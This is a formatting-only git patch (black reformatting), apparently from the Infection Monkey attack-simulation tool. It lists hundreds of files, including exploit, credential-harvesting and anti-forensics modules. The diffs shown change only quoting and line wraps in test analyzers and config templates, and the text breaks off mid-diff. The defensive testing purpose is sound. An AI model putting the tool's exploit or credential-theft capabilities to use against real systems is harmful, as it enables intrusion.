From c40f7bf6c97f599303dd6470c8f295ec8fc386bb Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Tue, 6 Apr 2021 09:19:27 -0400 Subject: [PATCH] Reformat all python with black v20.8b1 --- .../monkey_zoo/blackbox/analyzers/analyzer.py | 1 - .../blackbox/analyzers/analyzer_log.py | 1 - .../analyzers/communication_analyzer.py | 3 +- .../analyzers/performance_analyzer.py | 5 +- .../blackbox/analyzers/zerologon_analyzer.py | 39 +- .../config_templates/base_template.py | 8 +- .../config_templates/config_template.py | 1 - .../blackbox/config_templates/drupal.py | 12 +- .../blackbox/config_templates/elastic.py | 12 +- .../blackbox/config_templates/hadoop.py | 10 +- .../blackbox/config_templates/mssql.py | 24 +- .../blackbox/config_templates/performance.py | 102 ++- .../blackbox/config_templates/shellshock.py | 10 +- .../blackbox/config_templates/smb_mimikatz.py | 26 +- .../blackbox/config_templates/smb_pth.py | 14 +- .../blackbox/config_templates/ssh.py | 23 +- .../blackbox/config_templates/struts2.py | 10 +- .../blackbox/config_templates/tunneling.py | 51 +- .../blackbox/config_templates/weblogic.py | 10 +- .../blackbox/config_templates/wmi_mimikatz.py | 28 +- .../blackbox/config_templates/zerologon.py | 14 +- envs/monkey_zoo/blackbox/conftest.py | 32 +- .../island_client/island_config_parser.py | 19 +- .../island_client/monkey_island_client.py | 34 +- .../island_client/monkey_island_requests.py | 65 +- .../blackbox/log_handlers/monkey_log.py | 8 +- .../log_handlers/monkey_log_parser.py | 3 +- .../log_handlers/monkey_logs_downloader.py | 1 - .../log_handlers/test_logs_handler.py | 8 +- envs/monkey_zoo/blackbox/test_blackbox.py | 178 ++-- envs/monkey_zoo/blackbox/tests/basic_test.py | 1 - .../monkey_zoo/blackbox/tests/exploitation.py | 21 +- .../performance/endpoint_performance_test.py | 6 +- .../tests/performance/map_generation.py | 30 +- .../map_generation_from_telemetries.py | 25 +- .../tests/performance/performance_test.py | 6 +- .../performance/performance_test_config.py | 10 +- .../performance/performance_test_workflow.py | 13 +- .../tests/performance/report_generation.py | 37 +- .../report_generation_from_telemetries.py | 27 +- .../sample_file_parser.py | 24 +- .../sample_multiplier/fake_ip_generator.py | 6 +- .../sample_multiplier/fake_monkey.py | 5 +- .../sample_multiplier/sample_multiplier.py | 67 +- .../test_fake_ip_generator.py | 18 +- .../performance/telemetry_performance_test.py | 38 +- .../telemetry_performance_test_workflow.py | 23 +- .../blackbox/utils/gcp_machine_handlers.py | 19 +- envs/os_compatibility/conftest.py | 10 +- envs/os_compatibility/test_compatibility.py | 7 +- monkey/__init__.py | 2 +- monkey/common/__init__.py | 2 +- monkey/common/cloud/__init__.py | 2 +- monkey/common/cloud/aws/aws_instance.py | 25 +- monkey/common/cloud/aws/aws_service.py | 35 +- monkey/common/cloud/aws/test_aws_instance.py | 150 ++-- monkey/common/cloud/aws/test_aws_service.py | 12 +- monkey/common/cloud/azure/azure_instance.py | 17 +- .../common/cloud/azure/test_azure_instance.py | 176 ++-- monkey/common/cloud/gcp/gcp_instance.py | 15 +- monkey/common/cloud/instance.py | 1 + monkey/common/cloud/scoutsuite_consts.py | 10 +- monkey/common/cmd/aws/aws_cmd_result.py | 13 +- monkey/common/cmd/aws/aws_cmd_runner.py | 17 +- monkey/common/cmd/cmd.py | 2 +- monkey/common/cmd/cmd_result.py | 2 +- monkey/common/cmd/cmd_runner.py | 21 +- monkey/common/cmd/cmd_status.py | 2 +- monkey/common/common_consts/api_url_consts.py | 2 +- monkey/common/common_consts/network_consts.py | 2 +- .../common/common_consts/telem_categories.py | 18 +- .../common/common_consts/zero_trust_consts.py | 98 ++- monkey/common/config_value_paths.py | 26 +- monkey/common/network/__init__.py | 2 +- monkey/common/network/network_range.py | 34 +- monkey/common/network/network_utils.py | 4 +- monkey/common/network/test_network_utils.py | 6 +- .../common/network/test_segmentation_utils.py | 16 +- monkey/common/utils/attack_utils.py | 46 +- monkey/common/utils/mongo_utils.py | 10 +- monkey/common/utils/shellcode_obfuscator.py | 4 +- .../common/utils/test_shellcode_obfuscator.py | 5 +- monkey/common/utils/wmi_utils.py | 3 +- monkey/common/version.py | 6 +- monkey/infection_monkey/__init__.py | 2 +- monkey/infection_monkey/config.py | 88 +- monkey/infection_monkey/control.py | 292 ++++--- monkey/infection_monkey/dropper.py | 177 ++-- .../infection_monkey/exploit/HostExploiter.py | 48 +- monkey/infection_monkey/exploit/drupal.py | 117 ++- .../infection_monkey/exploit/elasticgroovy.py | 45 +- monkey/infection_monkey/exploit/hadoop.py | 59 +- monkey/infection_monkey/exploit/mssqlexec.py | 108 ++- monkey/infection_monkey/exploit/sambacry.py | 300 ++++--- monkey/infection_monkey/exploit/shellshock.py | 137 +-- .../exploit/shellshock_resources.py | 806 +++++++++--------- monkey/infection_monkey/exploit/smbexec.py | 133 +-- monkey/infection_monkey/exploit/sshexec.py | 121 +-- monkey/infection_monkey/exploit/struts2.py | 50 +- .../exploit/tests/test_zerologon.py | 20 +- .../zerologon_utils/test_vuln_assessment.py | 4 +- .../infection_monkey/exploit/tools/helpers.py | 48 +- .../exploit/tools/http_tools.py | 23 +- .../exploit/tools/payload_parsing.py | 14 +- .../exploit/tools/payload_parsing_test.py | 18 +- .../exploit/tools/smb_tools.py | 184 ++-- .../exploit/tools/test_helpers.py | 19 +- .../exploit/tools/wmi_tools.py | 35 +- monkey/infection_monkey/exploit/vsftpd.py | 90 +- monkey/infection_monkey/exploit/web_rce.py | 234 +++-- monkey/infection_monkey/exploit/weblogic.py | 84 +- .../infection_monkey/exploit/win_ms08_067.py | 282 +++--- monkey/infection_monkey/exploit/wmiexec.py | 104 ++- monkey/infection_monkey/exploit/zerologon.py | 77 +- .../exploit/zerologon_utils/dump_secrets.py | 5 +- .../exploit/zerologon_utils/remote_shell.py | 12 +- .../zerologon_utils/vuln_assessment.py | 15 +- .../exploit/zerologon_utils/wmiexec.py | 4 +- monkey/infection_monkey/main.py | 85 +- monkey/infection_monkey/model/__init__.py | 72 +- monkey/infection_monkey/model/host.py | 6 +- .../model/victim_host_generator.py | 2 +- .../model/victim_host_generator_test.py | 15 +- monkey/infection_monkey/monkey.py | 149 +++- monkey/infection_monkey/monkeyfs.py | 8 +- monkey/infection_monkey/network/HostFinger.py | 4 +- monkey/infection_monkey/network/__init__.py | 2 +- .../infection_monkey/network/elasticfinger.py | 15 +- monkey/infection_monkey/network/firewall.py | 85 +- monkey/infection_monkey/network/httpfinger.py | 13 +- monkey/infection_monkey/network/info.py | 49 +- .../network/mssql_fingerprint.py | 51 +- .../infection_monkey/network/mysqlfinger.py | 27 +- .../network/network_scanner.py | 17 +- .../infection_monkey/network/ping_scanner.py | 23 +- .../network/postgresql_finger.py | 35 +- monkey/infection_monkey/network/smbfinger.py | 162 ++-- monkey/infection_monkey/network/sshfinger.py | 26 +- .../infection_monkey/network/tcp_scanner.py | 14 +- .../network/test_postgresql_finger.py | 29 +- monkey/infection_monkey/network/tools.py | 56 +- .../infection_monkey/post_breach/__init__.py | 2 +- .../account_discovery/account_discovery.py | 10 +- .../linux_account_discovery.py | 4 +- .../post_breach/actions/add_user.py | 9 +- .../actions/change_file_privileges.py | 9 +- .../actions/clear_command_history.py | 27 +- .../actions/communicate_as_new_user.py | 38 +- .../post_breach/actions/discover_accounts.py | 10 +- .../post_breach/actions/hide_files.py | 18 +- .../actions/modify_shell_startup_files.py | 38 +- .../post_breach/actions/schedule_jobs.py | 14 +- .../post_breach/actions/timestomping.py | 4 +- .../post_breach/actions/use_signed_scripts.py | 18 +- .../post_breach/actions/use_trap_command.py | 3 +- .../post_breach/actions/users_custom_pba.py | 28 +- .../clear_command_history.py | 15 +- .../linux_clear_command_history.py | 44 +- .../job_scheduling/job_scheduling.py | 8 +- .../job_scheduling/linux_job_scheduling.py | 12 +- .../job_scheduling/windows_job_scheduling.py | 8 +- monkey/infection_monkey/post_breach/pba.py | 10 +- .../post_breach/post_breach_handler.py | 2 +- .../setuid_setgid/linux_setuid_setgid.py | 6 +- .../setuid_setgid/setuid_setgid.py | 4 +- .../linux/shell_startup_files_modification.py | 47 +- .../shell_startup_files_modification.py | 10 +- .../shell_startup_files_modification.py | 24 +- .../signed_script_proxy.py | 10 +- .../windows/signed_script_proxy.py | 17 +- .../tests/actions/test_users_custom_pba.py | 28 +- .../timestomping/linux/timestomping.py | 10 +- .../post_breach/timestomping/timestomping.py | 8 +- .../timestomping/windows/timestomping.py | 4 +- .../trap_command/linux_trap_command.py | 4 +- .../hook-infection_monkey.exploit.py | 4 +- .../hook-infection_monkey.network.py | 4 +- ...ok-infection_monkey.post_breach.actions.py | 4 +- ...infection_monkey.system_info.collectors.py | 4 +- monkey/infection_monkey/pyinstaller_utils.py | 4 +- .../system_info/SSH_info_collector.py | 51 +- .../infection_monkey/system_info/__init__.py | 22 +- .../system_info/azure_cred_collector.py | 80 +- .../system_info/collectors/aws_collector.py | 10 +- .../collectors/process_list_collector.py | 2 +- .../scoutsuite_collector.py | 14 +- .../system_info/linux_info_collector.py | 4 +- .../system_info/netstat_collector.py | 33 +- .../system_info/system_info_collector.py | 1 + .../system_info_collectors_handler.py | 7 +- .../mimikatz_cred_collector.py | 5 +- .../pypykatz_handler.py | 57 +- .../test_pypykatz_handler.py | 215 +++-- .../windows_credentials.py | 10 +- .../system_info/windows_info_collector.py | 31 +- .../system_info/wmi_consts.py | 101 ++- monkey/infection_monkey/system_singleton.py | 29 +- .../telemetry/attack/attack_telem.py | 6 +- .../telemetry/attack/t1005_telem.py | 7 +- .../telemetry/attack/t1035_telem.py | 2 +- .../telemetry/attack/t1064_telem.py | 6 +- .../telemetry/attack/t1105_telem.py | 8 +- .../telemetry/attack/t1107_telem.py | 6 +- .../telemetry/attack/t1197_telem.py | 6 +- .../telemetry/attack/t1222_telem.py | 6 +- .../telemetry/attack/usage_telem.py | 5 +- .../telemetry/attack/victim_host_telem.py | 7 +- .../infection_monkey/telemetry/base_telem.py | 2 +- .../telemetry/exploit_telem.py | 11 +- .../telemetry/post_breach_telem.py | 11 +- .../infection_monkey/telemetry/scan_telem.py | 6 +- .../telemetry/scoutsuite_telem.py | 5 +- .../infection_monkey/telemetry/state_telem.py | 6 +- .../telemetry/system_info_telem.py | 1 - .../tests/attack/test_victim_host_telem.py | 2 +- .../infection_monkey/telemetry/trace_telem.py | 5 +- .../telemetry/tunnel_telem.py | 5 +- monkey/infection_monkey/transport/base.py | 2 +- monkey/infection_monkey/transport/http.py | 81 +- monkey/infection_monkey/transport/tcp.py | 9 +- monkey/infection_monkey/tunnel.py | 56 +- .../infection_monkey/utils/auto_new_user.py | 2 +- monkey/infection_monkey/utils/environment.py | 2 +- monkey/infection_monkey/utils/hidden_files.py | 24 +- .../utils/linux/hidden_files.py | 32 +- monkey/infection_monkey/utils/linux/users.py | 46 +- .../infection_monkey/utils/monkey_log_path.py | 10 +- .../infection_monkey/utils/plugins/plugin.py | 28 +- .../utils/plugins/pluginTests/BadInit.py | 1 - .../utils/plugins/pluginTests/ComboFile.py | 1 - .../utils/plugins/plugin_test.py | 1 - .../utils/windows/hidden_files.py | 81 +- .../infection_monkey/utils/windows/users.py | 50 +- monkey/infection_monkey/windows_upgrader.py | 38 +- monkey/monkey_island/__init__.py | 2 +- monkey/monkey_island/cc/__init__.py | 2 +- monkey/monkey_island/cc/app.py | 115 +-- monkey/monkey_island/cc/arg_parser.py | 7 +- monkey/monkey_island/cc/database.py | 4 +- .../monkey_island/cc/environment/__init__.py | 29 +- monkey/monkey_island/cc/environment/aws.py | 2 +- .../cc/environment/environment_config.py | 4 +- .../cc/environment/environment_singleton.py | 21 +- .../monkey_island/cc/environment/password.py | 2 +- .../cc/environment/set_server_config.py | 2 +- .../monkey_island/cc/environment/standard.py | 8 +- .../cc/environment/test__init__.py | 34 +- .../cc/environment/test_environment_config.py | 12 +- .../cc/environment/test_user_creds.py | 7 +- .../cc/environment/user_creds.py | 13 +- monkey/monkey_island/cc/main.py | 46 +- monkey/monkey_island/cc/models/__init__.py | 9 +- .../cc/models/attack/attack_mitigations.py | 24 +- .../cc/models/attack/mitigation.py | 4 +- .../cc/models/command_control_channel.py | 1 + monkey/monkey_island/cc/models/config.py | 3 +- monkey/monkey_island/cc/models/creds.py | 3 +- monkey/monkey_island/cc/models/edge.py | 2 +- monkey/monkey_island/cc/models/monkey.py | 34 +- monkey/monkey_island/cc/models/monkey_ttl.py | 10 +- monkey/monkey_island/cc/models/test_monkey.py | 53 +- .../cc/models/zero_trust/event.py | 8 +- .../cc/models/zero_trust/finding.py | 3 +- .../cc/models/zero_trust/monkey_finding.py | 4 +- .../models/zero_trust/scoutsuite_finding.py | 6 +- .../cc/models/zero_trust/test_event.py | 10 +- .../models/zero_trust/test_monkey_finding.py | 24 +- .../zero_trust/test_scoutsuite_finding.py | 19 +- .../cc/resources/T1216_pba_file_download.py | 8 +- monkey/monkey_island/cc/resources/__init__.py | 2 +- .../cc/resources/attack/__init__.py | 2 +- .../cc/resources/attack/attack_config.py | 19 +- .../cc/resources/attack/attack_report.py | 16 +- .../monkey_island/cc/resources/auth/auth.py | 14 +- .../cc/resources/auth/auth_user.py | 2 +- .../cc/resources/auth/registration.py | 2 +- .../monkey_island/cc/resources/bootloader.py | 15 +- .../cc/resources/bootloader_test.py | 85 +- .../monkey_island/cc/resources/client_run.py | 2 +- monkey/monkey_island/cc/resources/edge.py | 4 +- .../monkey_island/cc/resources/environment.py | 6 +- .../cc/resources/island_configuration.py | 8 +- .../monkey_island/cc/resources/island_logs.py | 2 +- .../monkey_island/cc/resources/local_run.py | 19 +- monkey/monkey_island/cc/resources/log.py | 8 +- monkey/monkey_island/cc/resources/monkey.py | 117 +-- .../cc/resources/monkey_configuration.py | 9 +- .../monkey_control/started_on_island.py | 2 +- .../cc/resources/monkey_download.py | 88 +- monkey/monkey_island/cc/resources/netmap.py | 8 +- monkey/monkey_island/cc/resources/node.py | 4 +- .../monkey_island/cc/resources/node_states.py | 2 +- .../cc/resources/pba_file_download.py | 2 +- .../cc/resources/pba_file_upload.py | 32 +- .../monkey_island/cc/resources/remote_run.py | 34 +- monkey/monkey_island/cc/resources/root.py | 11 +- .../cc/resources/security_report.py | 1 - .../monkey_island/cc/resources/telemetry.py | 43 +- .../cc/resources/telemetry_feed.py | 106 +-- .../cc/resources/test/clear_caches.py | 1 + .../cc/resources/test/log_test.py | 8 +- .../cc/resources/test/monkey_test.py | 4 +- .../cc/resources/test/telemetry_test.py | 4 +- .../cc/resources/test/utils/telem_store.py | 25 +- .../cc/resources/version_update.py | 8 +- .../cc/resources/zero_trust/finding_event.py | 11 +- .../zero_trust/scoutsuite_auth/aws_keys.py | 1 - .../scoutsuite_auth/scoutsuite_auth.py | 23 +- .../resources/zero_trust/zero_trust_report.py | 14 +- .../cc/server_utils/bootloader_server.py | 17 +- .../monkey_island/cc/server_utils/consts.py | 4 +- .../cc/server_utils/custom_json_encoder.py | 1 - .../cc/server_utils/encryptor.py | 10 +- .../cc/server_utils/island_logger.py | 4 +- monkey/monkey_island/cc/services/__init__.py | 2 +- .../cc/services/attack/__init__.py | 2 +- .../cc/services/attack/attack_config.py | 61 +- .../cc/services/attack/attack_report.py | 159 ++-- .../cc/services/attack/attack_schema.py | 154 ++-- .../cc/services/attack/mitre_api_interface.py | 32 +- .../attack/technique_reports/T1003.py | 32 +- .../attack/technique_reports/T1005.py | 53 +- .../attack/technique_reports/T1016.py | 46 +- .../attack/technique_reports/T1018.py | 43 +- .../attack/technique_reports/T1021.py | 42 +- .../attack/technique_reports/T1035.py | 2 +- .../attack/technique_reports/T1041.py | 13 +- .../attack/technique_reports/T1053.py | 4 +- .../attack/technique_reports/T1059.py | 24 +- .../attack/technique_reports/T1064.py | 2 +- .../attack/technique_reports/T1065.py | 2 +- .../attack/technique_reports/T1075.py | 58 +- .../attack/technique_reports/T1082.py | 85 +- .../attack/technique_reports/T1086.py | 37 +- .../attack/technique_reports/T1090.py | 2 +- .../attack/technique_reports/T1105.py | 23 +- .../attack/technique_reports/T1106.py | 2 +- .../attack/technique_reports/T1107.py | 41 +- .../attack/technique_reports/T1110.py | 37 +- .../attack/technique_reports/T1129.py | 6 +- .../attack/technique_reports/T1136.py | 5 +- .../attack/technique_reports/T1145.py | 22 +- .../attack/technique_reports/T1146.py | 28 +- .../attack/technique_reports/T1156.py | 37 +- .../attack/technique_reports/T1168.py | 4 +- .../attack/technique_reports/T1188.py | 12 +- .../attack/technique_reports/T1197.py | 29 +- .../attack/technique_reports/T1210.py | 52 +- .../attack/technique_reports/T1216.py | 28 +- .../attack/technique_reports/T1222.py | 26 +- .../attack/technique_reports/T1504.py | 28 +- .../attack/technique_reports/__init__.py | 47 +- .../attack/technique_reports/pba_technique.py | 36 +- .../technique_report_tools.py | 20 +- .../technique_reports/usage_technique.py | 49 +- .../attack/test_mitre_api_interface.py | 9 +- .../monkey_island/cc/services/bootloader.py | 44 +- .../cc/services/bootloader_test.py | 13 +- monkey/monkey_island/cc/services/config.py | 192 +++-- .../cc/services/config_schema/basic.py | 38 +- .../services/config_schema/basic_network.py | 82 +- .../services/config_schema/config_schema.py | 16 +- .../definitions/finger_classes.py | 54 +- .../definitions/post_breach_actions.py | 82 +- .../system_info_collector_classes.py | 51 +- .../cc/services/config_schema/internal.py | 279 +++--- .../cc/services/config_schema/monkey.py | 77 +- monkey/monkey_island/cc/services/database.py | 13 +- .../cc/services/edge/displayed_edge.py | 45 +- monkey/monkey_island/cc/services/edge/edge.py | 15 +- .../cc/services/edge/test_displayed_edge.py | 114 +-- .../cc/services/edge/test_edge.py | 5 +- .../cc/services/groups_and_users_consts.py | 2 +- .../cc/services/infection_lifecycle.py | 23 +- .../monkey_island/cc/services/island_logs.py | 12 +- monkey/monkey_island/cc/services/log.py | 34 +- .../cc/services/netmap/net_edge.py | 42 +- .../cc/services/netmap/net_node.py | 1 - monkey/monkey_island/cc/services/node.py | 220 +++-- .../cc/services/post_breach_files.py | 28 +- .../cc/services/remote_run_aws.py | 65 +- .../cc/services/reporting/aws_exporter.py | 256 +++--- .../cc/services/reporting/exporter_init.py | 5 +- .../exploiter_descriptor_enum.py | 65 +- .../exploiter_report_info.py | 6 +- .../processors/cred_exploit.py | 25 +- .../exploit_processing/processors/exploit.py | 8 +- .../processors/shellshock_exploit.py | 13 +- .../processors/zerologon.py | 9 +- .../cc/services/reporting/pth_report.py | 239 +++--- .../cc/services/reporting/report.py | 509 ++++++----- .../reporting/report_exporter_manager.py | 4 +- .../report_generation_synchronisation.py | 2 + .../cc/services/reporting/test_report.py | 73 +- .../cc/services/representations.py | 6 +- .../cc/services/representations_test.py | 40 +- .../services/telemetry/processing/exploit.py | 65 +- .../telemetry/processing/post_breach.py | 28 +- .../telemetry/processing/processing.py | 33 +- .../cc/services/telemetry/processing/scan.py | 30 +- .../telemetry/processing/scoutsuite.py | 22 +- .../cc/services/telemetry/processing/state.py | 21 +- .../telemetry/processing/system_info.py | 63 +- .../processing/system_info_collectors/aws.py | 4 +- .../system_info_telemetry_dispatcher.py | 52 +- .../test_environment.py | 7 +- .../test_system_info_telemetry_dispatcher.py | 11 +- .../telemetry/processing/test_post_breach.py | 124 ++- .../services/telemetry/processing/tunnel.py | 8 +- .../cc/services/telemetry/processing/utils.py | 8 +- .../zero_trust_checks/antivirus_existence.py | 36 +- .../communicate_as_new_user.py | 35 +- .../zero_trust_checks/data_endpoints.py | 109 ++- .../zero_trust_checks/known_anti_viruses.py | 2 +- .../zero_trust_checks/machine_exploited.py | 24 +- .../zero_trust_checks/segmentation.py | 60 +- .../test_segmentation_checks.py | 38 +- .../telemetry/zero_trust_checks/tunneling.py | 32 +- .../services/tests/reporting/test_report.py | 10 +- .../cc/services/tests/test_config.py | 9 +- .../cc/services/utils/network_utils.py | 35 +- .../cc/services/utils/node_states.py | 64 +- .../cc/services/utils/node_states_test.py | 17 +- .../cc/services/version_update.py | 22 +- .../monkey_island/cc/services/wmi_handler.py | 147 ++-- .../monkey_zt_details_service.py | 30 +- .../monkey_zt_finding_service.py | 22 +- .../test_monkey_zt_details_service.py | 20 +- .../test_monkey_zt_finding_service.py | 45 +- .../scoutsuite/consts/rule_consts.py | 4 +- .../consts/rule_names/cloudformation_rules.py | 6 +- .../consts/rule_names/cloudtrail_rules.py | 16 +- .../consts/rule_names/cloudwatch_rules.py | 6 +- .../consts/rule_names/config_rules.py | 6 +- .../scoutsuite/consts/rule_names/ec2_rules.py | 56 +- .../scoutsuite/consts/rule_names/elb_rules.py | 10 +- .../consts/rule_names/elbv2_rules.py | 14 +- .../scoutsuite/consts/rule_names/iam_rules.py | 68 +- .../scoutsuite/consts/rule_names/rds_rules.py | 20 +- .../consts/rule_names/redshift_rules.py | 16 +- .../scoutsuite/consts/rule_names/s3_rules.py | 40 +- .../scoutsuite/consts/rule_names/ses_rules.py | 8 +- .../scoutsuite/consts/rule_names/sns_rules.py | 18 +- .../scoutsuite/consts/rule_names/sqs_rules.py | 20 +- .../scoutsuite/consts/rule_names/vpc_rules.py | 20 +- .../consts/scoutsuite_finding_maps.py | 115 ++- .../consts/scoutsuite_findings_list.py | 22 +- .../scoutsuite/consts/service_consts.py | 52 +- .../scoutsuite/data_parsing/rule_parser.py | 12 +- .../abstract_rule_path_creator.py | 12 +- .../cloudformation_rule_path_creator.py | 9 +- .../cloudtrail_rule_path_creator.py | 9 +- .../cloudwatch_rule_path_creator.py | 9 +- .../config_rule_path_creator.py | 9 +- .../ec2_rule_path_creator.py | 5 +- .../elb_rule_path_creator.py | 5 +- .../elbv2_rule_path_creator.py | 5 +- .../iam_rule_path_creator.py | 5 +- .../rds_rule_path_creator.py | 5 +- .../redshift_rule_path_creator.py | 9 +- .../s3_rule_path_creator.py | 5 +- .../ses_rule_path_creator.py | 5 +- .../sns_rule_path_creator.py | 5 +- .../sqs_rule_path_creator.py | 5 +- .../vpc_rule_path_creator.py | 5 +- .../rule_path_creators_list.py | 96 ++- .../data_parsing/test_rule_parser.py | 30 +- .../scoutsuite/scoutsuite_auth_service.py | 26 +- .../scoutsuite/scoutsuite_rule_service.py | 25 +- .../scoutsuite_zt_finding_service.py | 32 +- .../test_scoutsuite_auth_service.py | 14 +- .../test_scoutsuite_rule_service.py | 45 +- .../test_scoutsuite_zt_finding_service.py | 10 +- .../zero_trust/test_common/finding_data.py | 28 +- .../test_common/monkey_finding_data.py | 15 +- .../test_common/raw_scoutsute_data.py | 237 +++-- .../test_common/scoutsuite_finding_data.py | 98 +-- .../zero_trust_report/finding_service.py | 17 +- .../zero_trust_report/pillar_service.py | 17 +- .../zero_trust_report/principle_service.py | 21 +- .../test_common/example_finding_data.py | 83 +- .../zero_trust_report/test_finding_service.py | 58 +- .../zero_trust_report/test_pillar_service.py | 44 +- .../test_principle_service.py | 86 +- monkey/monkey_island/cc/setup.py | 21 +- .../cc/test_common/fixtures/fixture_enum.py | 2 +- .../fixtures/mongomock_fixtures.py | 6 +- .../profiling/profiler_decorator.py | 7 +- .../pyinstaller_hooks/hook-stix2.py | 4 +- .../scripts/island_password_hasher.py | 2 +- 490 files changed, 9607 insertions(+), 7227 deletions(-) diff --git a/envs/monkey_zoo/blackbox/analyzers/analyzer.py b/envs/monkey_zoo/blackbox/analyzers/analyzer.py index 13db46cb3..c4b55c766 100644 --- a/envs/monkey_zoo/blackbox/analyzers/analyzer.py +++ b/envs/monkey_zoo/blackbox/analyzers/analyzer.py @@ -2,7 +2,6 @@ from abc import ABCMeta, abstractmethod class Analyzer(object, metaclass=ABCMeta): - @abstractmethod def analyze_test_results(self) -> bool: raise NotImplementedError() diff --git a/envs/monkey_zoo/blackbox/analyzers/analyzer_log.py b/envs/monkey_zoo/blackbox/analyzers/analyzer_log.py index f97418813..88d06d52b 100644 --- a/envs/monkey_zoo/blackbox/analyzers/analyzer_log.py +++ b/envs/monkey_zoo/blackbox/analyzers/analyzer_log.py @@ -2,7 +2,6 @@ LOG_INIT_MESSAGE = "Analysis didn't run." class AnalyzerLog(object): - def __init__(self, analyzer_name): self.contents = LOG_INIT_MESSAGE self.name = analyzer_name diff --git a/envs/monkey_zoo/blackbox/analyzers/communication_analyzer.py b/envs/monkey_zoo/blackbox/analyzers/communication_analyzer.py index 22841f783..9f43bee7c 100644 --- a/envs/monkey_zoo/blackbox/analyzers/communication_analyzer.py +++ b/envs/monkey_zoo/blackbox/analyzers/communication_analyzer.py @@ -3,7 +3,6 @@ from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog class CommunicationAnalyzer(Analyzer): - def __init__(self, island_client, machine_ips): self.island_client = island_client self.machine_ips = machine_ips @@ -21,5 +20,5 @@ class CommunicationAnalyzer(Analyzer): return all_monkeys_communicated def did_monkey_communicate_back(self, machine_ip): - query = {'ip_addresses': {'$elemMatch': {'$eq': machine_ip}}} + query = {"ip_addresses": {"$elemMatch": {"$eq": machine_ip}}} return len(self.island_client.find_monkeys_in_db(query)) > 0 diff --git a/envs/monkey_zoo/blackbox/analyzers/performance_analyzer.py b/envs/monkey_zoo/blackbox/analyzers/performance_analyzer.py index 4a43ab6a5..18390e67e 100644 --- a/envs/monkey_zoo/blackbox/analyzers/performance_analyzer.py +++ b/envs/monkey_zoo/blackbox/analyzers/performance_analyzer.py @@ -9,8 +9,9 @@ LOGGER = logging.getLogger(__name__) class PerformanceAnalyzer(Analyzer): - - def __init__(self, performance_test_config: PerformanceTestConfig, endpoint_timings: Dict[str, timedelta]): + def __init__( + self, performance_test_config: PerformanceTestConfig, endpoint_timings: Dict[str, timedelta] + ): self.performance_test_config = performance_test_config self.endpoint_timings = endpoint_timings diff --git a/envs/monkey_zoo/blackbox/analyzers/zerologon_analyzer.py b/envs/monkey_zoo/blackbox/analyzers/zerologon_analyzer.py index f5da3a2e1..6f71256b9 100644 --- a/envs/monkey_zoo/blackbox/analyzers/zerologon_analyzer.py +++ b/envs/monkey_zoo/blackbox/analyzers/zerologon_analyzer.py @@ -3,19 +3,25 @@ from pprint import pformat import dpath.util -from common.config_value_paths import USER_LIST_PATH, PASSWORD_LIST_PATH, NTLM_HASH_LIST_PATH, LM_HASH_LIST_PATH +from common.config_value_paths import ( + USER_LIST_PATH, + PASSWORD_LIST_PATH, + NTLM_HASH_LIST_PATH, + LM_HASH_LIST_PATH, +) from envs.monkey_zoo.blackbox.analyzers.analyzer import Analyzer from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient # Query for telemetry collection to see if password restoration was successful -TELEM_QUERY = {'telem_category': 'exploit', - 'data.exploiter': 'ZerologonExploiter', - 'data.info.password_restored': True} +TELEM_QUERY = { + "telem_category": "exploit", + "data.exploiter": "ZerologonExploiter", + "data.info.password_restored": True, +} class ZerologonAnalyzer(Analyzer): - def __init__(self, island_client: MonkeyIslandClient, expected_credentials: List[str]): self.island_client = island_client self.expected_credentials = expected_credentials @@ -35,13 +41,12 @@ class ZerologonAnalyzer(Analyzer): @staticmethod def _get_relevant_credentials(config: dict): credentials_on_island = [] - credentials_on_island.extend(dpath.util.get(config['configuration'], USER_LIST_PATH)) - credentials_on_island.extend(dpath.util.get(config['configuration'], NTLM_HASH_LIST_PATH)) - credentials_on_island.extend(dpath.util.get(config['configuration'], LM_HASH_LIST_PATH)) + credentials_on_island.extend(dpath.util.get(config["configuration"], USER_LIST_PATH)) + credentials_on_island.extend(dpath.util.get(config["configuration"], NTLM_HASH_LIST_PATH)) + credentials_on_island.extend(dpath.util.get(config["configuration"], LM_HASH_LIST_PATH)) return credentials_on_island - def _is_all_credentials_in_list(self, - all_creds: List[str]) -> bool: + def _is_all_credentials_in_list(self, all_creds: List[str]) -> bool: credentials_missing = [cred for cred in self.expected_credentials if cred not in all_creds] self._log_creds_not_gathered(credentials_missing) return not credentials_missing @@ -60,11 +65,13 @@ class ZerologonAnalyzer(Analyzer): def _log_credential_restore(self, telem_list: List[dict]): if telem_list: - self.log.add_entry("Zerologon exploiter telemetry contains indicators that credentials " - "were successfully restored.") + self.log.add_entry( + "Zerologon exploiter telemetry contains indicators that credentials " + "were successfully restored." + ) else: - self.log.add_entry("Credential restore failed or credential restore " - "telemetry not found on the Monkey Island.") + self.log.add_entry( + "Credential restore failed or credential restore " + "telemetry not found on the Monkey Island." + ) self.log.add_entry(f"Query for credential restore telem: {pformat(TELEM_QUERY)}") - - diff --git a/envs/monkey_zoo/blackbox/config_templates/base_template.py b/envs/monkey_zoo/blackbox/config_templates/base_template.py index 9ebea6f1f..316f02ed7 100644 --- a/envs/monkey_zoo/blackbox/config_templates/base_template.py +++ b/envs/monkey_zoo/blackbox/config_templates/base_template.py @@ -8,7 +8,9 @@ class BaseTemplate(ConfigTemplate): "basic.exploiters.exploiter_classes": [], "basic_network.scope.local_network_scan": False, "internal.classes.finger_classes": ["PingScanner", "HTTPFinger"], - "internal.monkey.system_info.system_info_collector_classes": - ["EnvironmentCollector", "HostnameCollector"], - "monkey.post_breach.post_breach_actions": [] + "internal.monkey.system_info.system_info_collector_classes": [ + "EnvironmentCollector", + "HostnameCollector", + ], + "monkey.post_breach.post_breach_actions": [], } diff --git a/envs/monkey_zoo/blackbox/config_templates/config_template.py b/envs/monkey_zoo/blackbox/config_templates/config_template.py index e0ff4e568..915a0cc78 100644 --- a/envs/monkey_zoo/blackbox/config_templates/config_template.py +++ b/envs/monkey_zoo/blackbox/config_templates/config_template.py @@ -2,7 +2,6 @@ from abc import ABC, abstractmethod class ConfigTemplate(ABC): - @property @abstractmethod def config_values(self) -> dict: diff --git a/envs/monkey_zoo/blackbox/config_templates/drupal.py b/envs/monkey_zoo/blackbox/config_templates/drupal.py index e202219dc..28c50872e 100644 --- a/envs/monkey_zoo/blackbox/config_templates/drupal.py +++ 